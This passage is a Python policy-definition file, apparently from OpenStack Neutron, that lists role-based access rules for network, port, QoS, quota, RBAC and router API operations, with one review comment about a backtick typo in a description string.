check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``segments`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``shared`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:network_type",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:network_type`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:physical_network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:physical_network`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:segmentation_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:segmentation_id`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:router:external",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``router:external`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``is_default`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:port_security_enabled",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``port_security_enabled`` attribute of a network",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="delete_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a network",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/networks/{id}"}],
),
base.APIRule(
name="get_network_ip_availability",
check_str=("role:reader and system_scope:all"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get network IP availability",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/network-ip-availabilities"},
{"method": "GET", "path": "/network-ip-availabilities/{network_id}"},
],
),
base.APIRule(
name="create_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a network segment range",
scope_types=["system"],
operations=[{"method": "POST", "path": "/network_segment_ranges"}],
),
base.APIRule(
name="get_network_segment_range",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a network segment range",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/network_segment_ranges"},
{"method": "GET", "path": "/network_segment_ranges/{id}"},
],
),
base.APIRule(
name="update_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a network segment range",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/network_segment_ranges/{id}"}],
),
base.APIRule(
name="delete_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a network segment range",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/network_segment_ranges/{id}"}],
),
base.APIRule(
name="create_port",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:device_owner",
check_str=(
"not rule:network_device or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:context_is_advsvc or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``device_owner`` attribute when creting a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:mac_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``mac_address`` attribute when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``fixed_ips`` information when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips:ip_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify IP address in ``fixed_ips`` when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips:subnet_id",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify subnet ID in ``fixed_ips`` when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:port_security_enabled",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``port_security_enabled`` attribute when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:host_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``binding:host_id`` attribute when creating a port",
scope_types=["system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``binding:profile`` attribute when creating a port",
scope_types=["system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:vnic_type",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``binding:vnic_type`` attribute when creating a port",
scope_types=["project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:allowed_address_pairs",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``allowed_address_pairs`` attribute when creating a port",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
    name="create_port:allowed_address_pairs:mac_address",
    check_str=(
        "role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
    ),
    basic_check_str=(
        "role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
    ),
    # NOTE(review): the description below has malformed RST inline markup —
    # ``mac_address` of `allowed_address_pairs`` uses single backticks where the
    # sibling entries (e.g. the ip_address variant and the update_port
    # counterpart) use double backticks around each attribute name. This file
    # looks auto-generated, so the typo presumably originates in the upstream
    # policy definition; fix it at the generator/source rather than here, since
    # tests may compare this string byte-for-byte against generated output.
    description="Specify ``mac_address` of `allowed_address_pairs`` attribute when creating a port",
    scope_types=["project", "system"],
    operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:allowed_address_pairs:ip_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``ip_address`` of ``allowed_address_pairs`` attribute when creating a port",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="get_port",
check_str=(
"rule:context_is_advsvc or (role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a port",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:vif_type",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:vif_type`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:vif_details",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:vif_details`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:host_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:host_id`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:profile",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:profile`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:resource_request",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``resource_request`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="update_port",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:device_owner",
check_str=(
"not rule:network_device or rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``device_owner`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:mac_address",
check_str=("role:admin and system_scope:all or rule:context_is_advsvc"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``mac_address`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips:ip_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify IP address in ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips:subnet_id",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify subnet ID in ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:port_security_enabled",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``port_security_enabled`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:host_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``binding:host_id`` attribute of a port",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``binding:profile`` attribute of a port",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:vnic_type",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``binding:vnic_type`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs:mac_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``mac_address`` of ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs:ip_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``ip_address`` of ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:data_plane_status",
check_str=("role:admin and system_scope:all or role:data_plane_integrator"),
basic_check_str=("role:admin"),
description="Update ``data_plane_status`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="delete_port",
check_str=(
"rule:context_is_advsvc or (role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a port",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/ports/{id}"}],
),
base.APIRule(
name="get_policy",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Get QoS policies",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies"},
{"method": "GET", "path": "/qos/policies/{id}"},
],
),
base.APIRule(
name="create_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS policy",
scope_types=["system"],
operations=[{"method": "POST", "path": "/qos/policies"}],
),
base.APIRule(
name="update_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS policy",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/qos/policies/{id}"}],
),
base.APIRule(
name="delete_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS policy",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/qos/policies/{id}"}],
),
base.APIRule(
name="get_rule_type",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get available QoS rule types",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/rule-types"},
{"method": "GET", "path": "/qos/rule-types/{rule_type}"},
],
),
base.APIRule(
name="get_policy_bandwidth_limit_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS bandwidth limit rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/bandwidth_limit_rules"},
{
"method": "GET",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="create_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{"method": "POST", "path": "/qos/policies/{policy_id}/bandwidth_limit_rules"},
],
),
base.APIRule(
name="update_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{
"method": "PUT",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="delete_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_policy_dscp_marking_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS DSCP marking rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/dscp_marking_rules"},
{"method": "GET", "path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}"},
],
),
base.APIRule(
name="create_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS DSCP marking rule",
scope_types=["system"],
operations=[{"method": "POST", "path": "/qos/policies/{policy_id}/dscp_marking_rules"}],
),
base.APIRule(
name="update_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS DSCP marking rule",
scope_types=["system"],
operations=[
{"method": "PUT", "path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}"},
],
),
base.APIRule(
name="delete_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS DSCP marking rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_policy_minimum_bandwidth_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS minimum bandwidth rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/minimum_bandwidth_rules"},
{
"method": "GET",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="create_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{"method": "POST", "path": "/qos/policies/{policy_id}/minimum_bandwidth_rules"},
],
),
base.APIRule(
name="update_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{
"method": "PUT",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="delete_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_alias_bandwidth_limit_rule",
check_str=("rule:get_policy_bandwidth_limit_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_bandwidth_limit_rule",
check_str=("rule:update_policy_bandwidth_limit_rule"),
basic_check_str=("role:admin"),
description="Update a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_bandwidth_limit_rule",
check_str=("rule:delete_policy_bandwidth_limit_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="get_alias_dscp_marking_rule",
check_str=("rule:get_policy_dscp_marking_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_dscp_marking_rule",
check_str=("rule:update_policy_dscp_marking_rule"),
basic_check_str=("role:admin"),
description="Update a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_dscp_marking_rule",
check_str=("rule:delete_policy_dscp_marking_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="get_alias_minimum_bandwidth_rule",
check_str=("rule:get_policy_minimum_bandwidth_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_minimum_bandwidth_rule",
check_str=("rule:update_policy_minimum_bandwidth_rule"),
basic_check_str=("role:admin"),
description="Update a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_minimum_bandwidth_rule",
check_str=("rule:delete_policy_minimum_bandwidth_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[
{"method": "DELETE", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"},
],
),
base.APIRule(
name="get_quota",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a resource quota",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/quota"},
{"method": "GET", "path": "/quota/{id}"},
],
),
base.APIRule(
name="update_quota",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a resource quota",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/quota/{id}"}],
),
base.APIRule(
name="delete_quota",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a resource quota",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/quota/{id}"}],
),
base.APIRule(
name="create_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Create an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/rbac-policies"}],
),
base.APIRule(
name="create_rbac_policy:target_tenant",
check_str=("role:admin and system_scope:all or rule:restrict_wildcard"),
basic_check_str=("role:admin"),
description="Specify ``target_tenant`` when creating an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/rbac-policies"}],
),
base.APIRule(
name="update_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Update an RBAC policy",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="update_rbac_policy:target_tenant",
check_str=("role:admin and system_scope:all or rule:restrict_wildcard"),
basic_check_str=("role:admin"),
description="Update ``target_tenant`` attribute of an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="get_rbac_policy",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an RBAC policy",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/rbac-policies"},
{"method": "GET", "path": "/rbac-policies/{id}"},
],
),
base.APIRule(
name="delete_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Delete an RBAC policy",
scope_types=["project", "system"],
operations=[{"method": "DELETE", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="create_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a router",
scope_types=["project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:distributed",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``distributed`` attribute when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:ha",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``ha`` attribute when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``external_gateway_info`` information when creating a router",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:network_id",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``network_id`` in ``external_gateway_info`` information when creating a router",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:enable_snat",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``enable_snat`` in ``external_gateway_info`` information when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:external_fixed_ips",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``external_fixed_ips`` in ``external_gateway_info`` information when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="get_router",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a router",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="get_router:distributed",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``distributed`` attribute of a router",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="get_router:ha",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``ha`` attribute of a router",
scope_types=["system"],
operations=[
